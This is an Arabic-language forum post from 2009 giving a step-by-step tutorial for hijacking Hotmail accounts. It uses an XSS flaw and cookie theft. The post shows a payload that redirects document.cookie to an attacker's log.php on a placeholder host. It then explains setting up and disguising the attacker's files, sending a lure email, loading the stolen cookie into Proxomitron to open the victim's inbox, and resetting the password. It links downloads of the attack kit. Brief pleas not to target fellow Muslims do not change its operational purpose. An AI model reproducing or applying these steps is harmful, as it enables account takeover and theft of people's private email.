منتدى الحب والرومانسيه
أهلا ومرحبا بك عزيزى الزائر معنا نتمنى لك قضاء اسعد الأوقات معنا : إداره منتدى الحب والرومانسيه
منتدى الحب والرومانسيه
أهلا ومرحبا بك عزيزى الزائر معنا نتمنى لك قضاء اسعد الأوقات معنا : إداره منتدى الحب والرومانسيه
منتدى الحب والرومانسيه
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.



 
الرئيسيةالــبــوابـهأحدث الصورالتسجيلدخول

 

 قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور

اذهب الى الأسفل 
كاتب الموضوعرسالة
A.D.M.I.N
ـآدـآره ـالمنتدي
ـآدـآره ـالمنتدي
A.D.M.I.N


المشاركات : 3045
نقاط عضويتك : 6552
الوظيفة : طالب
الجنس : ذكر
وطنى : قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 1egypt10
مزاجي : قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور Pi-ca-24
الاوسمه : الادارة

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور Empty
مُساهمةموضوع: قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور   قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور I_icon_minitimeالسبت مايو 16, 2009 7:57 pm

بسم الله الرحمن الرحيم

السلام عليكم ورحمه الله وبركاته

رجاء خاص لحد يستخدمها ضد اخوانه العرب والمسلمين
وانا ادري اغلبكم يخترق ربعه بس رجاء خاص اخواني...

بسم الله نبدأ الشرح:-

طبعا ثغره الهوتميل اقوى ثغره التي هزت شركه الـ MSN
وقللت من حمايتها وانسرقت اغلب اميلات الشباب الموجوده بالنت
واول ثغره نزلت عام 2005 ... الي يجي ويقول عارفها من زمان
اقوله الثغره كانت برايفت بس انتشرت وهالثغره الي بشرحها
كانت برايفت بس انشرحت وهذي انا شرحتها مره ثانيه بمنتديات مياسه

اول شئ بعطيكم معلومه عن ثغرات الــ Xss

طبعا الـ Xss او الCross Site Scripting ثغرات حلوه جدا
وهي لها صله بالــ C o o k i e s ومن خلال هذا الـ C o o k i e s
تقدر انك تستفيد من معلومات الكوكيز نفسه

واحد يجي يسألني طيب يا كويتي صخر كيف نستفيد؟

انا اقولك كيف تستفيد.... ^^

طبعا الكوكيز موجود بكل جهاز وبكل منتدى تسجل فيه الكوكيز يجيك
تلقائي بجهازك علشان اذا دشيت المنتدى مره ثانيه يتسجل تلقائي
تلقى نفسك متسجل خالص بس تدش تشارك ليش يصير هالشئ؟

لان الكوكيز دش جهازك وانحفظ وطبعا مو خطر ان يدش جهازك
وله فايده على المنتدى نفسه ان يحصد اكثر عدد من الاجهزه

انا شرحت من كم فتره ثغره الفلاش تبع منتديات الـ vBulletin
ان يوصلك الكوكيز على اميلك ومن ثم تاخذ برنامج كوكيز اديتور
وتغير الـ LastVisit و Userid و Password
وتسوي حفظ وتدش المنتدى بأسم الادمن هذي الثغره تسمى Xss
ليش؟ لان يوصلك الكوكيز واي ثغره تتعلق بالكوكيز اسمها Xss

الحين احنا عرفنا نبذه عن ثغره الـ Xss

طيب كيف مثلا يا كويتي صخر اعطيني شرح مبسط لثغرة xss .. ؟

مثلا عندنا ثغرة xss بمنتدى Invision Power Board

مثلا
http://xxx.com/forums/index.php

الحين الxss بالمنتدى

http://xxx.com/forums/index.php?act=idx='>xss

الحين بمكان كلمه xss نضيف كود خبيث يعرض لنا الكوكيز و هو

javascript:alert(document.****** )


يصير كالتالي :

http://xxx.com/forums/index.php?act=idx=
javascript:alert(documen t.co o k ie )


الأن بعد ما نكتب الرابط بالمتصفح راح تظهر لنا نافذة Microsoft Internet Exploler و داخلها معلومات الكوكيز بجهازك تبع المنتدى ..

طيب جميل جدا الأن كل شئ .. لكن لسة ما وصلنا كيف راح يسرق الهكر الكوكيز من جهازي

الحين انا الى دخلت على الرابط و ظهر لي الكوكيز في جهازي ما ظهرت للهكر !!..

فعلا الكوكيز ظهر على جهازك!! مثلا الهكر يبي يشوف هالكوكيز عنده شنو يسوي؟

راح يستخدم شئ اسمه الـLog و يربطه مع الثغرة ..

ايش هو الLog ؟

الوج هذا عبارة عن ملف مكتوب بلغة الphp يقوم بتسجيل الكوكيز الى توصله في ملف txt او يرسلها على الأيميل..

الحين لما يجي الهكر يربط الثغرة بملف الوج و انت تدخل على الرابط اول لما تدخل على الرابط راح ترسل الكوكيز لملف الlog و يحصل عليها الهكر .. ( مثل ما شرحت بثغره الفلاش )

نشوف مثال لربط ملف الوج بالثغرة .. راح نستبدل الكود الخبيث

javascript:alert(document.****** )


و الرابط يكون :

http://xxx.com/forums/index.php?act=idx=
location.href="http://www.xxx.com/log.php?id="+escape(document.******



http://www.xxx.com/log.php = رابط ملف الوج الى راح يرسل له الكوكيز

طيب الحين نفرض الهكريبي يسرق الكوكيز من جهازك راح يرسلك هذا الرابط اول لما تدخل عليه راح ترسل الكوكيز إلي راح يسجلها في ملف txt على الموقع او يرسلها علطول على الأيميل ..

الحين جذي عرفنا تطبيق بسيط لثغرة xss و اصبح لدينا خلفية عنها و فهمنا كيف تتم ..

---------------------------

الحين بعد هالمقدمه الطويله ندش بصلب الموضوع

يوجد بالهوتميل ثغره خطيره جدا جدا من نوع Xss
التي تؤدي الى سرقه الاميل بالكوكيز بدون برامج....

بالبداية انا راح اشرح الثغرة ليس لهدف استغلالها و السرقه بها و لكن لعرض مدى خطورتها على كل واحد
و كمان نرى هذي الأيام انتشار عمليات سرقه ايميلات ناس كثير بدون استقابل اي برامج او باتشات

و و اللًة انا برئ تماما ممن يستخدم الثغرة على المسـلمينء في سرقه ايميلاتهم و اللًة على ما اقول شهيد ..

.::: بسم اللًة نبداء الشرح ::..

بالنسبه لتطبيق الثغره راح نحتاج 4 ملفات...

1- ملف الــ Log.php
2- ملف js
3- ملف الــ index.htm
4: كود استغلال الثغرة ..

ِشوف الصوره:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 1

الحين راح يتم التعديل على الملفات
بالبدايه نفتح ملف الــ index.php بمفكره
شوف الصوره:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 2

ونعدل على الي داخله شوف الصوره وياي :-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 3

بدال الـ xxx حط اسم موقعك علشان يكون التعديل على موقعك

والحين نفتح ملف الــ js

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 4

ونعدل عليه كما في الصوره الحين:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 5

والحين نفتح الــ FTP على موقعك وتنقل الملفات عليها

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 6

وتنقل ملفات الثغره كامله كما هو مشورح بالصوره
واحسن شئ انك ترفعه مع المجلد كامل وتسميه اي شئ وتمويه للضحيه سميه
مثل اسم المنتدى يعني مثال :- vb
علشان ما يشك الضحيه ويقول ان الرابط صحيح لمنتدى فاهمين علي؟

وبعدين نعطي المجلد الي فيه الثغره تصريح رقم 777
وطريقه اعطاء التصاريح بالصوره شوف:-
قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 7

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 8

وبعدين ترسل رساله من اميلك على اميل الي تبي تسرقه
في وقت دخول الي دزيتله رساله راح يشيك على الرسايل ويشوف الرساله مالتك
يفتحها اول ما يفتحها راح تشوف مجلد الثغره زاد ملف ثاني اسمه
majed.htm هذا المجلد اهو الي فيه الكوكيز
يعني يصير الرابط مال الملف الي فيه الكوكيز بالطريقه هذي
http://www.xxx.com/vb/majed.htm

حيث ان xxx
هو اسم الموقع تبعك وراح تشوف الكوكيز كما في الصوره التاليه:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 9

انسخ الكوكيز كاااامل وتأكد ان الكوكيز كامل
وبعدين افتح برنامج اسمه
Proxomitron

وهذي ايقونته:-
قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 10

تفتحه البرنامج وتروح على قائمه الهيدر
شوف الصوره وياي:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 11

وبعدين راح نضغط على قائمه نيو شوف الصوره:-

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 12

وبعدين راح يفتحلك مربع ثاني
قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 13

مثل ما تشوف راح تحط الفراغ الاول مثل ماهو مكتوب
والفراغ الثاني تتركه فاضي طبعا
والفراغ الثالث تحط فيه علامه النجمه "*"

والفراغ الرابط طبعا الكوكيز كاااامل وتأكد ان كااامل وانسخه والصفه بالفراغ الاخير
وبعدين اضغط اوكي

قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 14

وبعدين راح تشوف كلمه كوكيز اشل على الصح الي على Out
وبعدين اضغط على Apply
واضغط على Ok

والحين خلاص اخر خطوه تسويها والي اهي الدخول على رابط الاستغلال
والي اهو:-

http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

وراح تشوف الانبوكس تبع الاميل الي تبي تسرقه قدامك
وشوف هذا تطبيق للثغره مالت الهوتميل


قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 15

والحين خلاص تقدر تسوي اي شئ وتغير الباسوورد
تدخل على موقع الهوتميل الي اهو
www.hotmail.com
وتضغط على نسيان الباسوورد ولكن ليس على الاميل البديل
على الاميل نفسه وراح توصلك رساله من الشركه وتفغط على الرابط الاول
وتغير الباسوورد
وألف مبرووووووووووووك

ارجوا عدم تطبيقها ضد اخواننا العرب والمسلمين
وهذا انا قلتلكم ومن مصحلتكم هالشئ لان راح تاخذون ذنوب كثير
وما شرحتها علشان تسرقون بعض بالعكس
شرحتها علشان ما تقولون منتديات مياسه تحتكر المعلومهقنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور 015

للتحميل
http://www.zshare.net/download/1173085394ce3366/
http://rapidshare.com/files/113501766/zakariae123.rar.html

http://up.up700.com/view.php?file=357a0642bf

للمزيد من الشرح
http://www.jadide.org/vb/showthread.php?mode=hybrid&t=307
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://romansy4ever.7olm.org
 
قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا بالصور
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى الحب والرومانسيه :: منتدى البرامج الكاملة والنادرة :: الهكر والحماية من الاختراق :: ::قسم الهكر والحماية::-
انتقل الى: